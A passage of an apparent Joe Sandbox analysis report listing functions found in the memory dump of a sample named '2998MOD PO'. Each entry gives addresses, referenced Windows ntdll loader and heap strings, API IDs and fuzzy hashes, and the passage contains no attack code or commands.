                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019C0D60
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019C0D74
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                          • String ID:
                          • API String ID: 1404860816-0
                          • Opcode ID: 82ba43dedcfbaa5ee7b38e9cc119a1715defbb89a4096f35b36fe0c5562c7603
                          • Instruction ID: f7f72467e1653e292d1027f587913c3619f482d1a649b817c4ad94a131d83f30
                          • Opcode Fuzzy Hash: 82ba43dedcfbaa5ee7b38e9cc119a1715defbb89a4096f35b36fe0c5562c7603
                          • Instruction Fuzzy Hash: 3A424A75900715DFDB21CF28C880BAAB7F9BF44714F1445ADEA8DAB241E770AA84CF61
                          Function 0198A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                          • API String ID: 0-379654539
                          • Opcode ID: 21a0efa0b17c411f5a0b5c63512c30d1a16b6cff9248ab126eb7c52bf2e951ac
                          • Instruction ID: 52bb3a57f8029428d1781bd91a7af89609decb03e6519d047ee48078437f80c4
                          • Opcode Fuzzy Hash: 21a0efa0b17c411f5a0b5c63512c30d1a16b6cff9248ab126eb7c52bf2e951ac
                          • Instruction Fuzzy Hash: 59C19E71508382CFD712EF68C044B6AB7E8FF84704F04486EF9999B251E738CA45CB62
                          Function 019B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                          Download Yara Rule
                          Strings
                          • LdrpInitializeProcess, xrefs: 019B8422
                          • minkernel\ntdll\ldrinit.c, xrefs: 019B8421
                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 019B855E
                          • @, xrefs: 019B8591
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1918872054
                          • Opcode ID: 8c839011bea4d0c243a359dbe3e9a6584e374f1274c63c2c8e8103fdfd60f66b
                          • Instruction ID: de5f9966885071bf5562365ed4a33bee676a4cf2f4310056bc96997a7c1f2f41
                          • Opcode Fuzzy Hash: 8c839011bea4d0c243a359dbe3e9a6584e374f1274c63c2c8e8103fdfd60f66b
                          • Instruction Fuzzy Hash: 29916D71508345AFE721DF65CD80FABBAECBB88744F40092EFA8C96151E774D9448B52
                          Function 019B273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                          Download Yara Rule
                          Strings
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019F22B6
                          • .Local, xrefs: 019B28D8
                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019F21D9, 019F22B1
                          • SXS: %s() passed the empty activation context, xrefs: 019F21DE
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                          • API String ID: 0-1239276146
                          • Opcode ID: c46fadc0250293fd537d7d69dd384f10a214853cb19576e38bd2dd53b5b7530c
                          • Instruction ID: 3bff4b7f52566251402f2d5ba067c8b89e84e159fe5af7314eee01af842e0263
                          • Opcode Fuzzy Hash: c46fadc0250293fd537d7d69dd384f10a214853cb19576e38bd2dd53b5b7530c
                          • Instruction Fuzzy Hash: 7BA1AF359002299BDB25CF68C9C4BE9B7B9FF58354F1445E9D90CAB251D730AE81CF90
                          Function 019B4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                          Download Yara Rule
                          Strings
                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 019F3456
                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 019F342A
                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 019F3437
                          • RtlDeactivateActivationContext, xrefs: 019F3425, 019F3432, 019F3451
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                          • API String ID: 0-1245972979
                          • Opcode ID: 6ad427a6a981eec6ecf133223410cb0e80e97f3eac58b76c2d71f6b5f8d535b8
                          • Instruction ID: 111a3e391329bb133f64ec4a5d96d78322a1df4efd885169d2bc163cfedd9f38
                          • Opcode Fuzzy Hash: 6ad427a6a981eec6ecf133223410cb0e80e97f3eac58b76c2d71f6b5f8d535b8
                          • Instruction Fuzzy Hash: BE612532600712ABD722CF1DC981B6AB7E9FF90F51F15851DEA5E9B282C734E901CB91
                          Function 019864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                          Download Yara Rule
                          Strings
                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 019E0FE5
                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 019E1028
                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 019E106B
                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019E10AE
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                          • API String ID: 0-1468400865
                          • Opcode ID: 9d9e86d6c28c57d54ff8dbcafc8246b92529647185906a575267c9caadabc4c2
                          • Instruction ID: 8cd8883db6c413cd1dc7866ba5dbbb2856f4b9cc58268161a88b096736ef6aa6
                          • Opcode Fuzzy Hash: 9d9e86d6c28c57d54ff8dbcafc8246b92529647185906a575267c9caadabc4c2
                          • Instruction Fuzzy Hash: F971AFB19043059FDB21EF18C885F9B7FA8AF95764F440868F94C8B246D774D588CBE2
                          Function 019A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                          Download Yara Rule
                          Strings
                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 019EA992
                          • minkernel\ntdll\ldrinit.c, xrefs: 019EA9A2
                          • LdrpDynamicShimModule, xrefs: 019EA998
                          • apphelp.dll, xrefs: 019A2462
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-176724104
                          • Opcode ID: 3d8a5d3f969c2b8dfeabe5726e9d5537d63bb47169c9038c1b2671248c902df2
                          • Instruction ID: 8215146ea74abbb66d6bb25b3ae94ccf97edcaf0c829eb7b8b283b92e1b2f589
                          • Opcode Fuzzy Hash: 3d8a5d3f969c2b8dfeabe5726e9d5537d63bb47169c9038c1b2671248c902df2
                          • Instruction Fuzzy Hash: 31312879A00301ABDB32DF5DDC49EAAB7F9FFC4B00F160019E90867265C7749A46C780
                          Function 019929A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                          Download Yara Rule
                          Strings
                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0199327D
                          • HEAP: , xrefs: 01993264
                          • HEAP[%wZ]: , xrefs: 01993255
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                          • API String ID: 0-617086771
                          • Opcode ID: 2287c9093f948bc318e9026c11013fac7ca4310e956e2ca6eea03648ad12d673
                          • Instruction ID: 68f80ed3b4e18818095c66e6510c59f5d88b35266f4ea34fd1cc0c8ec6dcdad2
                          • Opcode Fuzzy Hash: 2287c9093f948bc318e9026c11013fac7ca4310e956e2ca6eea03648ad12d673
                          • Instruction Fuzzy Hash: 6B92AB71A042499FEF25CFACC444BAEBBF5FF48300F188499E859AB391D735AA45CB50
                          Function 01990770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-4253913091
                          • Opcode ID: f0cca4116e6b8535f7e00d0d7264f53dd36fb782f2b4220338210b022410b961
                          • Instruction ID: 3f65dc38b4d8bcd1ca65ad6385796eba40ef6fa60d80fb6c0dcc2c0b2df43270
                          • Opcode Fuzzy Hash: f0cca4116e6b8535f7e00d0d7264f53dd36fb782f2b4220338210b022410b961
                          • Instruction Fuzzy Hash: 72F18B34A00606DFEB16CF6CC984F6AB7F9FB84304F194569E52A9B381D734E981CB91
                          Function 019A6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: $@
                          • API String ID: 0-1077428164
                          • Opcode ID: 9d6860a2ec1ab63b971812a3adb9bb253cf7638648d840367f3a17f4fc815378
                          • Instruction ID: 972ca5e287fdeb240d412c4fb5bdb15515652419846e08d7aabec8306484045f
                          • Opcode Fuzzy Hash: 9d6860a2ec1ab63b971812a3adb9bb253cf7638648d840367f3a17f4fc815378
                          • Instruction Fuzzy Hash: D5C270716083419FDB29CF68C881BABBBE5AFC8754F44892DE9CD87241D735D809CB92
                          Function 0197A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: FilterFullPath$UseFilter$\??\
                          • API String ID: 0-2779062949
                          • Opcode ID: 2bc0600f6c125098dba0e3f246c04eed8517a169cbb2da3d91b1d9341d1cad91
                          • Instruction ID: cf0b4ea0b84afb274026637233e5bfbeb46387a716f55a0084a41659b6f8ba14
                          • Opcode Fuzzy Hash: 2bc0600f6c125098dba0e3f246c04eed8517a169cbb2da3d91b1d9341d1cad91
                          • Instruction Fuzzy Hash: EEA16B759116299BDB31DF68CC88BEAB7B8EF44B10F1041EAE90CA7250DB359E85CF50
                          Function 019A0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                          Download Yara Rule
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 019EA121
                          • LdrpCheckModule, xrefs: 019EA117
                          • Failed to allocated memory for shimmed module list, xrefs: 019EA10F
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-161242083
                          • Opcode ID: 656d983a12fc9765c1077e013ea26505e2f4659a07b594a247a4e8cd7890b098
                          • Instruction ID: 39abcdf4f641235f1a34b14833705fd44a0fe843365ffc20b7d5f67eb305ea09
                          • Opcode Fuzzy Hash: 656d983a12fc9765c1077e013ea26505e2f4659a07b594a247a4e8cd7890b098
                          • Instruction Fuzzy Hash: DF71D274E002059FDF26DF68CD44BBEB7F8FB84604F58442DE80AA7211E734AA46CB91
                          Function 01990A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-1334570610
                          • Opcode ID: 7f4cf8bf385f89cdc4cbbc2b09e88f9fd3c7180e10b4ae357426f290de7b8a50
                          • Instruction ID: 0a3802d39bfa0808a22e0601ff09a4d73ab839b3686333b4ca90797f984860f4
                          • Opcode Fuzzy Hash: 7f4cf8bf385f89cdc4cbbc2b09e88f9fd3c7180e10b4ae357426f290de7b8a50
                          • Instruction Fuzzy Hash: F661C030600301DFEF29CF28C544B6ABBE9FF44308F198559E46D8B296D774E841CB91
                          Function 019BC720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                          Download Yara Rule
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 019F82E8
                          • LdrpInitializePerUserWindowsDirectory, xrefs: 019F82DE
                          • Failed to reallocate the system dirs string !, xrefs: 019F82D7
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1783798831
                          • Opcode ID: 1f3e8e75fc5bfdd6f391b436e1d2597b584a2b0c1f7523ea414212528d783bb1
                          • Instruction ID: c1da28eb0935a056a7d169ff369f25a4382f1704f0f66bd9129ab41d0da8fd6f
                          • Opcode Fuzzy Hash: 1f3e8e75fc5bfdd6f391b436e1d2597b584a2b0c1f7523ea414212528d783bb1
                          • Instruction Fuzzy Hash: 0841E175654301ABDB21EB68DD84F9B77E8EF84B50F41492AB94CD3260E770E9018B91
                          Function 01A3C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                          Download Yara Rule
                          Strings
                          • PreferredUILanguages, xrefs: 01A3C212
                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A3C1C5
                          • @, xrefs: 01A3C1F1
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                          • API String ID: 0-2968386058
                          • Opcode ID: e4d544d153458d22da09b78eeccbf84c9054a80633f66f0147d5b11ffd58630b
                          • Instruction ID: 0ea7d1e15762d2191edda0bae02f7d7ec9b9c5cd99596c613b5aa066d4ce9406
                          • Opcode Fuzzy Hash: e4d544d153458d22da09b78eeccbf84c9054a80633f66f0147d5b11ffd58630b
                          • Instruction Fuzzy Hash: 23415572E00219EBDF11EBD8CC51FEEBBB8AB94710F14416BFA09B7244D7749A448B90
                          Function 01A14144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                          • API String ID: 0-1373925480
                          • Opcode ID: e4a401b3f7d1ba88aae95c4b9ce4eb8f815b7faa003cdb1af3b8ee6360b5c93e
                          • Instruction ID: 5c251cf2bce81f8827da158355a9a01d6d3ce88423c50abbbbef31baa5db11d4
                          • Opcode Fuzzy Hash: e4a401b3f7d1ba88aae95c4b9ce4eb8f815b7faa003cdb1af3b8ee6360b5c93e
                          • Instruction Fuzzy Hash: B7412232A047588BEB26DBEDC840BEDBBB9FF99340F28045AD905EB785D7348941CB50
                          Function 01A04755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                          Download Yara Rule
                          Strings
                          • minkernel\ntdll\ldrredirect.c, xrefs: 01A04899
                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A04888
                          • LdrpCheckRedirection, xrefs: 01A0488F
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                          • API String ID: 0-3154609507
                          • Opcode ID: bfbf6476045897bb9ed9c523a1e2e7300e235b9858cfe476e61efb357bf8e600
                          • Instruction ID: df4a81aa20d83c6ec9658a88d6a52dddaa271987cfc3eecf8679ae30db851560
                          • Opcode Fuzzy Hash: bfbf6476045897bb9ed9c523a1e2e7300e235b9858cfe476e61efb357bf8e600
                          • Instruction Fuzzy Hash: C541A132A047519FDB23CF69E940A26BBE4BF8D750B09095DEF4897291D730DA04CB91
                          Function 01990BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                          • API String ID: 0-2558761708
                          • Opcode ID: 5b12fe5503ce9fc916a1ebc1910bdbeb244bc379cd3f1293ea87c97ea6604d13
                          • Instruction ID: dbf7c84f9d3da6abf2aa82ea6cddf0ffa683ca5d1b979d678da742ff04d123c4
                          • Opcode Fuzzy Hash: 5b12fe5503ce9fc916a1ebc1910bdbeb244bc379cd3f1293ea87c97ea6604d13
                          • Instruction Fuzzy Hash: EB11DF353141029FEF6ADA1CC848F76B3E9EF80A1AF1A8519F41ECB252EB30D841C750
                          Function 01A020DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                          Download Yara Rule
                          Strings
                          • LdrpInitializationFailure, xrefs: 01A020FA
                          • minkernel\ntdll\ldrinit.c, xrefs: 01A02104
                          • Process initialization failed with status 0x%08lx, xrefs: 01A020F3
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2986994758
                          • Opcode ID: 17335ae9e547d886188b3affa2b3d817716d97796b0d311718aebdc475f609d4
                          • Instruction ID: 55c6074acaaf9b72a7d12771fb6ca4da73b648ee395dc980b26a7680bd926db5
                          • Opcode Fuzzy Hash: 17335ae9e547d886188b3affa2b3d817716d97796b0d311718aebdc475f609d4
                          • Instruction Fuzzy Hash: 52F0C239A40308BBEB25E74CED56F99776CFBC0B54F510069FA48772C5D2B0AA01CB92
                          Function 019903E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: #%u
                          • API String ID: 48624451-232158463
                          • Opcode ID: 5df8c85d049f369e9d741ca80b1a96854a6c3e13e0cec4ee5af184b3bae55b95
                          • Instruction ID: 4ad5d5adf17bec72113f5a1e0a15c820508503681b2a29c2f42e270b065625ce
                          • Opcode Fuzzy Hash: 5df8c85d049f369e9d741ca80b1a96854a6c3e13e0cec4ee5af184b3bae55b95
                          • Instruction Fuzzy Hash: 58715B71A0014A9FDF02DFA9C994FAEB7F8BF48744F144065E909E7251EA34EE41CBA1
                          Function 0198A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                          Download Yara Rule
                          Strings
                          • LdrResSearchResource Exit, xrefs: 0198AA25
                          • LdrResSearchResource Enter, xrefs: 0198AA13
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                          • API String ID: 0-4066393604
                          • Opcode ID: e0411d61b0c7bf01ffb4d19738dbf209f7c56eb834a3cdc1062e742d9f43a813
                          • Instruction ID: 18743c742e365d9def2bd251f0a47204f8aab56efa0a0d6b5544c40428df238d
                          • Opcode Fuzzy Hash: e0411d61b0c7bf01ffb4d19738dbf209f7c56eb834a3cdc1062e742d9f43a813
                          • Instruction Fuzzy Hash: 98E18271E00219AFEF22DF99C984BAEBBBEBF54311F14482AE909E7251D734D941CB50
                          Function 01A4A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: `$`
                          • API String ID: 0-197956300
                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                          • Instruction ID: 8df248991102378b9e8f7770df82ca86b51ed27eb1fd88dc8e68d13698fd1f17
                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                          • Instruction Fuzzy Hash: 4FC1D2312443429BEB25CF28C941B6BBBE5BFC4318F084A2DF69ACB291D774D505CB82
                          Function 019FE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Legacy$UEFI
                          • API String ID: 2994545307-634100481
                          • Opcode ID: ef3d149923a253da45501cc3b07af1156ef0a9d8b1dd770b376524329da9c34d
                          • Instruction ID: 17759a4fe1270c9b914d7aacaba8186dcb92e592d7cab568682d51a97df960b0
                          • Opcode Fuzzy Hash: ef3d149923a253da45501cc3b07af1156ef0a9d8b1dd770b376524329da9c34d
                          • Instruction Fuzzy Hash: AE613C71E00319AFDB25DFA8C840BAEBBB9FB88704F15446DE64DEB261D731A940CB51
                          Function 01A243D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$MUI
                          • API String ID: 0-17815947
                          • Opcode ID: 8b4fd8654aa960153e105a8a6df5f5393711512b4785c730108035df5e74fc24
                          • Instruction ID: f29c8ec4b82f08ece3960ae53599288398da0ed19f28357e726206190f236ec8
                          • Opcode Fuzzy Hash: 8b4fd8654aa960153e105a8a6df5f5393711512b4785c730108035df5e74fc24
                          • Instruction Fuzzy Hash: 44511BB1D0062DAFEF11DFA9CC90EEEBBB8EB48754F100529E655B7290D6309E45CB60
                          Function 019804E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                          Download Yara Rule
                          Strings
                          • kLsE, xrefs: 01980540
                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0198063D
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                          • API String ID: 0-2547482624
                          • Opcode ID: e78284fcf51d1c9986e3f5fbfdc89f85d22517dacddad4dcaa6067cbb910cdf4
                          • Instruction ID: ee0fcb4285b97d27dc73028129ee505f1ebbc10aab9243d82ad772d18a69d4d0
                          • Opcode Fuzzy Hash: e78284fcf51d1c9986e3f5fbfdc89f85d22517dacddad4dcaa6067cbb910cdf4
                          • Instruction Fuzzy Hash: 3551CF715007468FD724EF29C4406A7BBE8AF84309F18493EFA9D87241E730D549CBA2
                          Function 0198A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                          Download Yara Rule
                          Strings
                          • RtlpResUltimateFallbackInfo Exit, xrefs: 0198A309
                          • RtlpResUltimateFallbackInfo Enter, xrefs: 0198A2FB
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID:
                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                          • API String ID: 0-2876891731
                          • Opcode ID: 28658a9502759c65830db4d4b120490dba1612e23ddb4cde9746664884318248
                          • Instruction ID: eb50b4383db417738b0ddd70053ee1cc715b7556b45ac16dc623955ff5bf29a2
                          • Opcode Fuzzy Hash: 28658a9502759c65830db4d4b120490dba1612e23ddb4cde9746664884318248
                          • Instruction Fuzzy Hash: 6F41AF30A04649DFDB26DF69C444F6D7BF8FF85701F1844AAE908DB291E275D900CB50
                          Function 019BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.2041370277.0000000001950000.00000040.00001000.00020000.00000000.sdmp, Offset: 01950000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_1950000_2998MOD PO.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: Cleanup Group$Threadpool!
                          • API String ID: 2994545307-4008356553
                          • Opcode ID: f9c489b311dcc47390dde36b1c289e1b4afe44d9368d23b31dc761da31f9815c
                          • Instruction ID: 7aa7f2e95ef77aef936f8da0cb0599b9cda18bfcd924261cf85ea58fe6935ca7
